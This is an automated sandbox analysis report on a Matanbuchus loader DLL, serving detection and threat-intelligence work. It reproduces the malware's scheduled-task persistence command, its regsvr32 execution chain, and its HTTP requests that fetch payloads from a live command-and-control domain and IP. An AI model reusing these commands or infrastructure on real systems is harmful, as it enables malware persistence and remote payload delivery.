Windows Analysis Report
smphost.dll

Overview

General Information

Sample Name: smphost.dll
Analysis ID: 562835
MD5: fc484855692f2a7d1eae090086a1eb72
SHA1: 2e9103747750b40835f58d9e57c2ab75eeaf25f6
SHA256: e58b9bbb7bcdf3e901453b7b9c9e514fed1e53565e3280353dccc77cde26a98e
Tags: dll, matanbuchus, SATURNCONSULTANCYLTD, signed

Detection

Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Uses known network protocols on non-standard ports
Sigma detected: Regsvr32 Network Activity
Sigma detected: Suspicious Call by Ordinal
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a connection to the internet is available
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Registers a DLL
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 6120 cmdline: loaddll32.exe "C:\Users\user\Desktop\smphost.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 4764 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6212 cmdline: rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 3576 cmdline: regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • schtasks.exe (PID: 4532 cmdline: C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx MD5: 15FF7D8324231381BAD48A052F85DF04)
      • WerFault.exe (PID: 6348 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 2064 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 6256 cmdline: rundll32.exe C:\Users\user\Desktop\smphost.dll,DllInstall MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6760 cmdline: rundll32.exe C:\Users\user\Desktop\smphost.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5388 cmdline: rundll32.exe C:\Users\user\Desktop\smphost.dll,DllUnregisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • regsvr32.exe (PID: 5808 cmdline: C:\Windows\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 6460 cmdline: -e C:\ProgramData\6\5507.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
  • regsvr32.exe (PID: 1264 cmdline: C:\Windows\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 2016 cmdline: -e C:\ProgramData\6\5507.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: DNS queryAuthor: Dmitriy Lifanov, oscd.community: Data: Image: C:\Windows\SysWOW64\regsvr32.exe, QueryName: manageintel.com
Source: Process startedAuthor: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4764, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1, ProcessId: 6212

Persistence and Installation Behavior

Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx, CommandLine: C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 3576, ProcessCommandLine: C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx, ProcessId: 4532

AV Detection

Source: smphost.dllVirustotal: Detection: 8%
Source: http://manageintel.com/WUzZRUBQje/Auth.phpAvira URL Cloud: Label: malware
Source: smphost.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
Source: unknownHTTPS traffic detected: 185.14.31.158:443 -> 192.168.2.3:49759 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.14.31.158:443 -> 192.168.2.3:49841 version: TLS 1.2
Source: smphost.dllStatic PE information: certificate valid
Source: Binary string: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\Release\BhJM.pdb source: regsvr32.exe, 00000002.00000002.437623410.000000007FC00000.00000040.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000002.437475087.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6E9EED8A FindFirstFileExW,2_2_6E9EED8A
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 38_2_6F84ED8A FindFirstFileExW,38_2_6F84ED8A

Networking

Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 185.14.31.158 32710
Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: manageintel.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 32710
Source: unknownNetwork traffic detected: HTTP traffic on port 32710 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 32710
Source: unknownNetwork traffic detected: HTTP traffic on port 32710 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 32710
Source: unknownNetwork traffic detected: HTTP traffic on port 32710 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 32710
Source: unknownNetwork traffic detected: HTTP traffic on port 32710 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 32710
Source: unknownNetwork traffic detected: HTTP traffic on port 32710 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 32710
Source: unknownNetwork traffic detected: HTTP traffic on port 32710 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 32710
Source: unknownNetwork traffic detected: HTTP traffic on port 32710 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 32710
Source: unknownNetwork traffic detected: HTTP traffic on port 32710 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 32710
Source: unknownNetwork traffic detected: HTTP traffic on port 32710 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 32710
Source: unknownNetwork traffic detected: HTTP traffic on port 32710 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 32710
Source: unknownNetwork traffic detected: HTTP traffic on port 32710 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 32710
Source: unknownNetwork traffic detected: HTTP traffic on port 32710 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 32710
Source: unknownNetwork traffic detected: HTTP traffic on port 32710 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 32710
Source: unknownNetwork traffic detected: HTTP traffic on port 32710 -> 49855
Source: Joe Sandbox ViewASN Name: ITLDC-NLUA ITLDC-NLUA
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6E9E8210 InternetCheckConnectionA,InternetOpenUrlA,InternetReadFile,WriteFile,InternetCloseHandle,2_2_6E9E8210
Source: global trafficHTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/QXms.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /WUzZRUBQje/vAtVEC.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global trafficTCP traffic: 192.168.2.3:49762 -> 185.14.31.158:32710
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: regsvr32.exe, 00000002.00000002.437475087.0000000004CB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://manageintel.com/
Source: regsvr32.exeString found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xml
Source: regsvr32.exeString found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xml
Source: unknownHTTP traffic detected: POST /WUzZRUBQje/Auth.php HTTP/1.1User-Agent: Windows-AzureAD-Authentication-Provider/11.0Host: manageintel.comContent-Length: 549Content-Type: application/x-www-form-urlencodedAccept-Language: en-US
Source: unknownDNS traffic detected: queries for: manageintel.com

System Summary

Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 2064
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6E9F3EB62_2_6E9F3EB6
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6E9E8C902_2_6E9E8C90
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 38_2_6F853EB638_2_6F853EB6
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 38_2_6F848C9038_2_6F848C90
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 6E9E9960 appears 34 times
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 6F849960 appears 34 times
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
Source: smphost.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\smphost.dll"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllInstall
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllUnregisterServer
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -e C:\ProgramData\6\5507.ocx
Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERFBA1.tmp
Source: classification engineClassification label: mal88.troj.evad.winDLL@22/7@16/2
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6E9E8630 DllInstall,FormatMessageA,TextOutW,TextOutA,FormatMessageW,CoInitialize,OleInitialize,CoCreateInstance,CoGetCallerTID,FlattenPath,CreatePopupMenu,GetProductInfo,SetFileAttributesW,CharNextW,SHGetThreadRef,DceErrorInqTextA,GetConsoleCP,UuidCreate,GetMessageTime,GetVersion,GetPriorityClass,GetProcessId,IsTokenRestricted,RevertToSelf,RpcExceptionFilter,CveEventWrite,CoCancelCall,CoTaskMemAlloc,GetSidIdentifierAuthority,DisableThreadLibraryCalls,IsValidAcl,IsValidSid,CreateMutexExW,SHStrDupW,SHStrDupA,DuplicateIcon,2_2_6E9E8630
Source: C:\Windows\SysWOW64\regsvr32.exeMutant created: \Sessions\1\BaseNamedObjects\computer
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3576
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: smphost.dllStatic PE information: certificate valid
Source: smphost.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: smphost.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: smphost.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: smphost.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: smphost.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: smphost.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: smphost.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: smphost.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: smphost.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: smphost.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: smphost.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\regsvr32.exeFile created: C:\ProgramData\6\5507.ocx

Boot Survival

Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4856Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4856Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2008Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2008Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3244Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3244Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3244Thread sleep time: -330000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformation
Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000
Source: C:\Windows\SysWOW64\regsvr32.exeThread delayed: delay time: 30000
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_6E9E9CF7 IsDebuggerPresent,OutputDebugStringW
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_6E9EFE17 GetProcessHeap
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_6E9E1710 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_6E9E1490 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_6E9E83B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_6E9EC865 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_6E9EE9B4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 38_2_6F841710 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 38_2_6F841490 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 38_2_6F8483B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 38_2_6F84E9B4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 38_2_6F84C865 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\regsvr32.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_6E9E9AED SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_6E9EC0A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_6E9E9839 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 38_2_6F849AED SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 38_2_6F84C0A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 38_2_6F849839 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 185.14.31.158 32710
Source: C:\Windows\SysWOW64\regsvr32.exe | Domain query: manageintel.com
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_6E9E9658 cpuid
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_6E9E99A8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_6E9E8630 DllInstall,FormatMessageA,TextOutW,TextOutA,FormatMessageW,CoInitialize,OleInitialize,CoCreateInstance,CoGetCallerTID,FlattenPath,CreatePopupMenu,GetProductInfo,SetFileAttributesW,CharNextW,SHGetThreadRef,DceErrorInqTextA,GetConsoleCP,UuidCreate,GetMessageTime,GetVersion,GetPriorityClass,GetProcessId,IsTokenRestricted,RevertToSelf,RpcExceptionFilter,CveEventWrite,CoCancelCall,CoTaskMemAlloc,GetSidIdentifierAuthority,DisableThreadLibraryCalls,IsValidAcl,IsValidSid,CreateMutexExW,SHStrDupW,SHStrDupA,DuplicateIcon
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 111 Process Injection | 21 Virtualization/Sandbox Evasion | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 11 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 111 Process Injection | LSASS Memory | 31 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 11 Non-Standard Port | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 2 Ingress Tool Transfer | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Obfuscated Files or Information | NTDS | 21 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Scheduled Transfer | 3 Non-Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Regsvr32 | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | 4 Application Layer Protocol | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Rundll32 | Cached Domain Credentials | 1 System Network Connections Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 23 System Information Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Behavior Graph ID: 562835, Sample: smphost.dll, Start date: 30/01/2022, Architecture: WINDOWS, Score: 88

Source | Detection | Scanner | Label | Link
smphost.dll | 9% | Virustotal | | Browse
smphost.dll | 7% | ReversingLabs | Win32.Dropper.Generic |

Source | Detection | Scanner | Label | Link
C:\ProgramData\6\5507.ocx | 7% | ReversingLabs | Win32.Dropper.Generic |

No Antivirus matches

Source | Detection | Scanner | Label | Link
manageintel.com | 1% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
http://manageintel.com/WUzZRUBQje/Auth.php | 100% | Avira URL Cloud | malware |
https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xml | 0% | Avira URL Cloud | safe |
https://manageintel.com/WUzZRUBQje/vAtVEC.xml | 0% | Avira URL Cloud | safe |
https://manageintel.com/ | 0% | Avira URL Cloud | safe |
https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xml | 0% | Avira URL Cloud | safe |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
manageintel.com | 185.14.31.158 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://manageintel.com/WUzZRUBQje/Auth.php | true | Avira URL Cloud: malware | unknown
https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xml | true | Avira URL Cloud: safe | unknown
https://manageintel.com/WUzZRUBQje/vAtVEC.xml | true | Avira URL Cloud: safe | unknown
https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xml | true | Avira URL Cloud: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://manageintel.com/ | regsvr32.exe, 00000002.00000002.437475087.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.14.31.158 | manageintel.com | Ukraine | | 21100 | ITLDC-NLUA | true

IP
192.168.2.1
Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:562835
Start date:30.01.2022
Start time:13:29:09
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 10m 25s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:smphost.dll
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:39
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal88.troj.evad.winDLL@22/7@16/2
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 100% (good quality ratio 94.6%)
  • Quality average: 80.8%
  • Quality standard deviation: 26.8%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 45
  • Number of non-executed functions: 58
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .dll
  • Override analysis time to 240s for rundll32
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
  • Excluded IPs from analysis (whitelisted): 184.87.212.60, 2.20.157.220, 52.168.117.173
  • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net
  • Not all processes where analyzed, report is missing behavior information
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
13:29:59 | API Interceptor | 41x Sleep call for process: regsvr32.exe modified
13:30:03 | API Interceptor | 10x Sleep call for process: rundll32.exe modified
